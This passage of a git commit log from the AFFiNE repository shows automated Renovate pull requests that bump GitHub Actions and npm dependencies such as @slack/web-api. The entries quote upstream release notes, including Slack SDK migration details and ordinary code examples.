<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c59b43034b |
chore: bump up actions/labeler action to v7 (#15409)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/labeler](https://redirect.github.com/actions/labeler) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>actions/labeler (actions/labeler)</summary> ### [`v7.0.0`](https://redirect.github.com/actions/labeler/compare/v6.2.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/labeler/compare/v7.0.0...v7.0.0) ### [`v7`](https://redirect.github.com/actions/labeler/compare/v6.2.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/labeler/compare/v6.2.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
1f58173800 |
chore: bump up actions/checkout action to v7 (#15408)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/checkout](https://redirect.github.com/actions/checkout) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>actions/checkout (actions/checkout)</summary> ### [`v7.0.1`](https://redirect.github.com/actions/checkout/blob/HEAD/CHANGELOG.md#v701) [Compare Source](https://redirect.github.com/actions/checkout/compare/v7.0.0...v7.0.1) - Bump github/codeql-action from 3 to 4 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2475](https://redirect.github.com/actions/checkout/pull/2475) - Bump actions/setup-node from 4 to 6 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2477](https://redirect.github.com/actions/checkout/pull/2477) - Bump docker/build-push-action from 6.5.0 to 7.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2478](https://redirect.github.com/actions/checkout/pull/2478) - Bump docker/login-action from 3.3.0 to 4.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2479](https://redirect.github.com/actions/checkout/pull/2479) - Bump actions/checkout from 6 to 7 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2488](https://redirect.github.com/actions/checkout/pull/2488) - Bump actions/upload-artifact from 4 to 7 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2476](https://redirect.github.com/actions/checkout/pull/2476) - eslint 9 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2474](https://redirect.github.com/actions/checkout/pull/2474) - Bump the minor-actions-dependencies group with 2 updates by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2499](https://redirect.github.com/actions/checkout/pull/2499) - skip running unsafe pr check if input is default by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2518](https://redirect.github.com/actions/checkout/pull/2518) - trim only ascii whitespace for branch by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2521](https://redirect.github.com/actions/checkout/pull/2521) - escape values passed to --unset by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2530](https://redirect.github.com/actions/checkout/pull/2530) ### [`v7.0.0`](https://redirect.github.com/actions/checkout/blob/HEAD/CHANGELOG.md#v700) [Compare Source](https://redirect.github.com/actions/checkout/compare/v7.0.0...v7.0.0) - Block checking out fork PR for pull\_request\_target and workflow\_run by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2454](https://redirect.github.com/actions/checkout/pull/2454) - Bump actions/publish-immutable-action from 0.0.3 to 0.0.4 in the minor-actions-dependencies group across 1 directory by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2458](https://redirect.github.com/actions/checkout/pull/2458) - Bump flatted from 3.3.1 to 3.4.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2460](https://redirect.github.com/actions/checkout/pull/2460) - Bump js-yaml from 4.1.0 to 4.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2461](https://redirect.github.com/actions/checkout/pull/2461) - Bump [@​actions/core](https://redirect.github.com/actions/core) and [@​actions/tool-cache](https://redirect.github.com/actions/tool-cache) and Remove uuid by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2459](https://redirect.github.com/actions/checkout/pull/2459) - upgrade module to esm and update dependencies by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2463](https://redirect.github.com/actions/checkout/pull/2463) - Bump the minor-npm-dependencies group across 1 directory with 3 updates by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2462](https://redirect.github.com/actions/checkout/pull/2462) ### [`v7`](https://redirect.github.com/actions/checkout/blob/HEAD/CHANGELOG.md#v700) [Compare Source](https://redirect.github.com/actions/checkout/compare/v6.1.0...v7.0.0) - Block checking out fork PR for pull\_request\_target and workflow\_run by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2454](https://redirect.github.com/actions/checkout/pull/2454) - Bump actions/publish-immutable-action from 0.0.3 to 0.0.4 in the minor-actions-dependencies group across 1 directory by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2458](https://redirect.github.com/actions/checkout/pull/2458) - Bump flatted from 3.3.1 to 3.4.2 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2460](https://redirect.github.com/actions/checkout/pull/2460) - Bump js-yaml from 4.1.0 to 4.2.0 by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2461](https://redirect.github.com/actions/checkout/pull/2461) - Bump [@​actions/core](https://redirect.github.com/actions/core) and [@​actions/tool-cache](https://redirect.github.com/actions/tool-cache) and Remove uuid by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2459](https://redirect.github.com/actions/checkout/pull/2459) - upgrade module to esm and update dependencies by [@​aiqiaoy](https://redirect.github.com/aiqiaoy) in [#​2463](https://redirect.github.com/actions/checkout/pull/2463) - Bump the minor-npm-dependencies group across 1 directory with 3 updates by [@​dependabot](https://redirect.github.com/dependabot)\[bot] in [#​2462](https://redirect.github.com/actions/checkout/pull/2462) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a9096311f7 |
chore: bump up actions/cache action to v6 (#15406)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/cache](https://redirect.github.com/actions/cache) | action | major | `v5` → `v6` | --- ### Release Notes <details> <summary>actions/cache (actions/cache)</summary> ### [`v6.1.0`](https://redirect.github.com/actions/cache/releases/tag/v6.1.0) [Compare Source](https://redirect.github.com/actions/cache/compare/v6.0.0...v6.1.0) ##### What's Changed - Bump [@​actions/cache](https://redirect.github.com/actions/cache) to v6.1.0 - handle read-only cache access by [@​jasongin](https://redirect.github.com/jasongin) in [#​1768](https://redirect.github.com/actions/cache/pull/1768) **Full Changelog**: <https://github.com/actions/cache/compare/v6...v6.1.0> ### [`v6.0.0`](https://redirect.github.com/actions/cache/releases/tag/v6.0.0) [Compare Source](https://redirect.github.com/actions/cache/compare/v6.0.0...v6.0.0) #### What's Changed - Update packages, migrate to ESM by [@​Samirat](https://redirect.github.com/Samirat) in [#​1760](https://redirect.github.com/actions/cache/pull/1760) **Full Changelog**: <https://github.com/actions/cache/compare/v5...v6.0.0> ### [`v6`](https://redirect.github.com/actions/cache/compare/v5.0.5...v6.0.0) [Compare Source](https://redirect.github.com/actions/cache/compare/v5.1.0...v6.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8df82901ea |
chore: bump up @slack/web-api version to v8 (#15405)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@slack/web-api](https://docs.slack.dev/tools/node-slack-sdk/web-api/) ([source](https://redirect.github.com/slackapi/node-slack-sdk)) | [`^7.15.1` → `^8.0.0`](https://renovatebot.com/diffs/npm/@slack%2fweb-api/7.15.1/8.0.0) |  |  | --- ### Release Notes <details> <summary>slackapi/node-slack-sdk (@​slack/web-api)</summary> ### [`v8.0.0`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%408.0.0) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.19.0...@slack/web-api@8.0.0) ##### Major Changes - [`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c): Drop Node.js 18 support. The minimum supported Node.js version is now 20. - [`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c): Redesigned error handling to use proper `Error` subclasses instead of plain objects with a `code` property. **Migration:** Replace `if (error.code === ErrorCode.PlatformError)` with `if (error instanceof WebAPIPlatformError)`. All error classes extend a common `SlackError` base class (which extends `Error`), so you can also catch all SDK errors with `if (error instanceof SlackError)`. **New error class hierarchy:** - `SlackError` (abstract base) - `WebAPIPlatformError` — Slack API returned `ok: false` - `WebAPIRequestError` — Network/transport failure (original error in `cause`) - `WebAPIHTTPError` — Non-200 HTTP status from Slack - `WebAPIRateLimitedError` — HTTP 429 with `retryAfter` seconds - `WebAPIFileUploadInvalidArgumentsError` — Invalid file upload arguments - `WebAPIFileUploadReadFileDataError` — Failed to read file data for upload **Removed factory functions** (these were internal but exported — use `new` with the corresponding class instead): - `errorWithCode()` - `platformErrorFromResult()` → `new WebAPIPlatformError(...)` - `requestErrorWithOriginal()` → `new WebAPIRequestError(...)` - `httpErrorFromResponse()` → `new WebAPIHTTPError(...)` - `rateLimitedErrorWithDelay()` → `new WebAPIRateLimitedError(...)` **Other breaking type changes:** - `WebAPIHTTPError.headers` type changed from `IncomingHttpHeaders` to `Record<string, string>`. - The `CodedError` interface is deprecated — use `instanceof` checks with specific error classes instead. - Error `.name` values changed from generic `'Error'` to descriptive class names (e.g., `'WebAPIPlatformError'`). - [`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c): Replaced `axios` with the standard Fetch API for all HTTP transport. The following options and types have been removed from `WebClientOptions`: - **`agent`** — Use the new `fetch` option to provide a custom fetch implementation with proxy or keep-alive support. For proxies, prefer the built-in `http.setGlobalProxyFromEnv()` or `NODE_USE_ENV_PROXY=1` (Node.js 24+). For advanced use cases: ```ts import { fetch, Agent } from "undici"; const client = new WebClient(token, { fetch: (url, init) => fetch(url, { ...init, dispatcher: new Agent({ keepAliveTimeout: 60_000 }), }), }); ``` - **`tls`** and **`TLSOptions`** — Configure TLS via a custom `fetch` implementation with an undici `Agent`, or use the `NODE_EXTRA_CA_CERTS` environment variable. - **`requestInterceptor`** and **`RequestInterceptor`** type — Wrap the `fetch` function to intercept or modify requests before they are sent. - **`adapter`** and **`AdapterConfig`** type — Use the `fetch` option instead. - **`RequestConfig`** type (was an alias for Axios' `InternalAxiosRequestConfig`) — Removed entirely. - **`attachOriginalToWebAPIRequestError`** option — Removed. The original error is now always available via the standard `cause` property on `WebAPIRequestError`. The dependencies `axios`, `form-data`, `is-electron`, and `is-stream` have been removed. The default `fetch` implementation is `globalThis.fetch` (available in Node.js 20+). New exported types for custom fetch implementations: `FetchFunction`, `FetchResponse`, `FetchRequestInit`, `FetchHeaders`. - [`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c): Removed previously-deprecated API methods and their associated request/response types: - **`files.upload`** — Use `filesUploadV2` instead (available since v6.7). The `filesUploadV2` method handles the multi-step upload process automatically. - **`rtm.start`** — Use `rtm.connect` instead. The `rtm.start` method was deprecated by Slack in favor of the lighter-weight `rtm.connect`. - **`workflows.stepCompleted`**, **`workflows.stepFailed`**, **`workflows.updateStep`** — These methods supported the retired [Steps from Apps](https://api.slack.com/changelog/2023-08-workflow-steps-from-apps-step-back) feature (deprecated August 2023, retired September 2024). The `workflows.featured.*` and `admin.workflows.*` methods for the current Workflow Builder remain available. ##### Minor Changes - [`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c): feat: expand app manifest types — add `agent_view` and `assistant_view` features, recent agent events (`app_context_changed`, `assistant_thread_started`, `assistant_thread_context_changed`), optional OAuth scopes (`bot_optional`/`user_optional`), and event `metadata_subscriptions` ##### Patch Changes - [`bb49d99`](https://redirect.github.com/slackapi/node-slack-sdk/commit/bb49d99): fix: apply redact() to API response bodies in debug logs and recurse into nested objects, preventing tokens from leaking into logs when debug logging is enabled - Updated dependencies \[[`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c)] - Updated dependencies \[[`fc98c8c`](https://redirect.github.com/slackapi/node-slack-sdk/commit/fc98c8c)] - [@​slack/logger](https://redirect.github.com/slack/logger)@​5.0.0 - [@​slack/types](https://redirect.github.com/slack/types)@​3.0.0 ### [`v7.19.0`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%407.19.0) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.18.0...@slack/web-api@7.19.0) ##### Minor Changes - [`a795b86`](https://redirect.github.com/slackapi/node-slack-sdk/commit/a795b86): feat: expand app manifest types — add `agent_view` and `assistant_view` features, recent agent events (`app_context_changed`, `assistant_thread_started`, `assistant_thread_context_changed`), optional OAuth scopes (`bot_optional`/`user_optional`), and event `metadata_subscriptions` ### [`v7.18.0`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%407.18.0) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.17.0...@slack/web-api@7.18.0) ##### Minor Changes - [`07744de`](https://redirect.github.com/slackapi/node-slack-sdk/commit/07744de): feat: make `thread_ts` optional for `assistant.threads.setSuggestedPrompts` ### [`v7.17.0`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%407.17.0) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.16.0...@slack/web-api@7.17.0) ##### Minor Changes - [`2085900`](https://redirect.github.com/slackapi/node-slack-sdk/commit/2085900): feat: expose public read-only `ts` getter on `ChatStreamer` for fallback to [`chat.update`](https://docs.slack.dev/reference/methods/chat.update) when a stream expires server-side ```js import { WebClient } from "@​slack/web-api"; const client = new WebClient(process.env.SLACK_BOT_TOKEN); const streamer = client.chatStream({ channel: "C0123456789", thread_ts: "1700000001.123456", recipient_team_id: "T0123456789", recipient_user_id: "U0123456789", }); await streamer.append({ markdown_text: "hello!" }); // streamer.ts is now set after the first flush console.log(streamer.ts); await streamer.stop(); ``` ### [`v7.16.0`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%407.16.0) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.15.2...@slack/web-api@7.16.0) ##### Minor Changes - [`2814969`](https://redirect.github.com/slackapi/node-slack-sdk/commit/2814969): feat: add `highlight_type` to [`files.completeUploadExternal`](https://docs.slack.dev/reference/methods/files.completeUploadExternal) and [`filesUploadV2`](https://docs.slack.dev/tools/node-slack-sdk/web-api#upload-a-file) for optimistic rendering ```js import { WebClient } from "@​slack/web-api"; const client = new WebClient(process.env.SLACK_BOT_TOKEN); await client.filesUploadV2({ channel_id: "C0123456789", file: "./image.png", filename: "image.png", title: "Image Upload", highlight_type: "png", }); ``` ### [`v7.15.2`](https://redirect.github.com/slackapi/node-slack-sdk/releases/tag/%40slack/web-api%407.15.2) [Compare Source](https://redirect.github.com/slackapi/node-slack-sdk/compare/@slack/web-api@7.15.1...@slack/web-api@7.15.2) ##### Patch Changes - [`4b6fe3a`](https://redirect.github.com/slackapi/node-slack-sdk/commit/4b6fe3a): feat: add authorship arguments - `icon_emoji`, `icon_url`, and `username` - to the [`assistant.threads.setStatus`](https://docs.slack.dev/reference/methods/assistant.threads.setStatus/) and [`chat.startStream`](https://docs.slack.dev/reference/methods/chat.startStream/) methods - Updated dependencies \[[`4f03ee8`](https://redirect.github.com/slackapi/node-slack-sdk/commit/4f03ee8)] - [@​slack/types](https://redirect.github.com/slack/types)@​2.21.0 </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
c70eb811b9 |
chore: bump up @atlaskit/pragmatic-drag-and-drop-hitbox version to v2 (#15397)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@atlaskit/pragmatic-drag-and-drop-hitbox](https://atlassian.design/components/pragmatic-drag-and-drop/) ([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop)) | [`^1.1.0` → `^2.0.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop-hitbox/1.1.0/2.0.0) |  |  | --- ### Release Notes <details> <summary>atlassian/pragmatic-drag-and-drop (@​atlaskit/pragmatic-drag-and-drop-hitbox)</summary> ### [`v1.2.0`](https://redirect.github.com/atlassian/pragmatic-drag-and-drop/compare/0b015bf95f062c374df21b24b944f2ed1c031ec2...fd32fa138eb149ad1256902c4c479281ea4dea89) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
f0fdc58010 |
chore: bump up @napi-rs/simple-git version to v1 (#15401)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@napi-rs/simple-git](https://redirect.github.com/Brooooooklyn/simple-git) | [`^0.1.22` → `^1.0.0`](https://renovatebot.com/diffs/npm/@napi-rs%2fsimple-git/0.1.22/1.1.0) |  |  | --- ### Release Notes <details> <summary>Brooooooklyn/simple-git (@​napi-rs/simple-git)</summary> ### [`v1.1.0`](https://redirect.github.com/Brooooooklyn/simple-git/releases/tag/v1.1.0) [Compare Source](https://redirect.github.com/Brooooooklyn/simple-git/compare/v1.0.0...v1.1.0) ##### What's Changed - feat: simple-git.napi.rs website (landing + docs + Cloudflare deploy) by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​146](https://redirect.github.com/Brooooooklyn/simple-git/pull/146) - fix(deps): update dependency [@​void/md](https://redirect.github.com/void/md) to v0.10.5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​147](https://redirect.github.com/Brooooooklyn/simple-git/pull/147) - fix(deps): update dependency [@​void/react](https://redirect.github.com/void/react) to v0.10.5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​148](https://redirect.github.com/Brooooooklyn/simple-git/pull/148) - fix(deps): update dependency void to v0.10.5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​151](https://redirect.github.com/Brooooooklyn/simple-git/pull/151) - chore(deps): update dorny/paths-filter action to v4 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​150](https://redirect.github.com/Brooooooklyn/simple-git/pull/150) - feat: add `created` (first-add commit) to FileModification by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) in [#​152](https://redirect.github.com/Brooooooklyn/simple-git/pull/152) - fix(deps): update void to v0.10.6 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​153](https://redirect.github.com/Brooooooklyn/simple-git/pull/153) **Full Changelog**: <https://github.com/Brooooooklyn/simple-git/compare/v1.0.0...v1.1.0> ### [`v1.0.0`](https://redirect.github.com/Brooooooklyn/simple-git/releases/tag/v1.0.0) [Compare Source](https://redirect.github.com/Brooooooklyn/simple-git/compare/v0.1.22...v1.0.0) ##### What's Changed - feat: implement Repository.getFileCreatedDate method with async support by [@​Brooooooklyn](https://redirect.github.com/Brooooooklyn) with [@​Copilot](https://redirect.github.com/Copilot) in [#​100](https://redirect.github.com/Brooooooklyn/simple-git/pull/100) - chore(deps): update yarn to v4.9.3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​101](https://redirect.github.com/Brooooooklyn/simple-git/pull/101) - chore(deps): update yarn to v4.9.4 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​102](https://redirect.github.com/Brooooooklyn/simple-git/pull/102) - chore(deps): update actions/setup-node action to v5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​103](https://redirect.github.com/Brooooooklyn/simple-git/pull/103) - chore(deps): update yarn to v4.10.1 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​104](https://redirect.github.com/Brooooooklyn/simple-git/pull/104) - chore(deps): update yarn to v4.10.2 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​105](https://redirect.github.com/Brooooooklyn/simple-git/pull/105) - chore(deps): update yarn to v4.10.3 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​106](https://redirect.github.com/Brooooooklyn/simple-git/pull/106) - chore(deps): update actions/setup-node action to v6 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​108](https://redirect.github.com/Brooooooklyn/simple-git/pull/108) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​107](https://redirect.github.com/Brooooooklyn/simple-git/pull/107) - chore(deps): update github artifact actions (major) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​109](https://redirect.github.com/Brooooooklyn/simple-git/pull/109) - chore(deps): update dependency node to v24 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​110](https://redirect.github.com/Brooooooklyn/simple-git/pull/110) - chore(deps): update cross-platform-actions/action action to v0.30.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​112](https://redirect.github.com/Brooooooklyn/simple-git/pull/112) - chore(deps): update yarn to v4.11.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​113](https://redirect.github.com/Brooooooklyn/simple-git/pull/113) - chore(deps): update yarn to v4.12.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​115](https://redirect.github.com/Brooooooklyn/simple-git/pull/115) - chore(deps): update actions/checkout action to v6 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​114](https://redirect.github.com/Brooooooklyn/simple-git/pull/114) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​111](https://redirect.github.com/Brooooooklyn/simple-git/pull/111) - chore(deps): update actions/cache action to v5 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​116](https://redirect.github.com/Brooooooklyn/simple-git/pull/116) - chore(deps): update github artifact actions (major) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​117](https://redirect.github.com/Brooooooklyn/simple-git/pull/117) - chore(deps): update cross-platform-actions/action action to v0.31.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​118](https://redirect.github.com/Brooooooklyn/simple-git/pull/118) - chore(deps): update cross-platform-actions/action action to v0.32.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​119](https://redirect.github.com/Brooooooklyn/simple-git/pull/119) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​120](https://redirect.github.com/Brooooooklyn/simple-git/pull/120) - chore(deps): update dependency ava to v7 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​122](https://redirect.github.com/Brooooooklyn/simple-git/pull/122) - chore(deps): update github artifact actions (major) by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​121](https://redirect.github.com/Brooooooklyn/simple-git/pull/121) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​123](https://redirect.github.com/Brooooooklyn/simple-git/pull/123) - chore(deps): update yarn to v4.13.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​124](https://redirect.github.com/Brooooooklyn/simple-git/pull/124) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​125](https://redirect.github.com/Brooooooklyn/simple-git/pull/125) - chore(deps): update cross-platform-actions/action action to v1 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​126](https://redirect.github.com/Brooooooklyn/simple-git/pull/126) - chore(deps): update yarn to v4.14.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​127](https://redirect.github.com/Brooooooklyn/simple-git/pull/127) - chore(deps): update yarn to v4.14.1 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​128](https://redirect.github.com/Brooooooklyn/simple-git/pull/128) - chore(deps): lock file maintenance by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​130](https://redirect.github.com/Brooooooklyn/simple-git/pull/130) - chore(deps): update dependency ava to v8 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​129](https://redirect.github.com/Brooooooklyn/simple-git/pull/129) - chore(deps): update cross-platform-actions/action action to v1.1.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​131](https://redirect.github.com/Brooooooklyn/simple-git/pull/131) - fix(deps): update rust crate git2 to 0.21 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​132](https://redirect.github.com/Brooooooklyn/simple-git/pull/132) - chore(deps): update yarn to v4.15.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​133](https://redirect.github.com/Brooooooklyn/simple-git/pull/133) - chore(deps): update cross-platform-actions/action action to v1.2.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​134](https://redirect.github.com/Brooooooklyn/simple-git/pull/134) - chore(deps): update yarn to v4.16.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​135](https://redirect.github.com/Brooooooklyn/simple-git/pull/135) - chore(deps): update yarn monorepo to v4.17.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in [#​136](https://redirect.github.com/Brooooooklyn/simple-git/pull/136) - chore(deps): update cross-platform-actions/action action to v1.3.0 by [@​renovate](https://redirect.github.com/renovate)\[bot] in 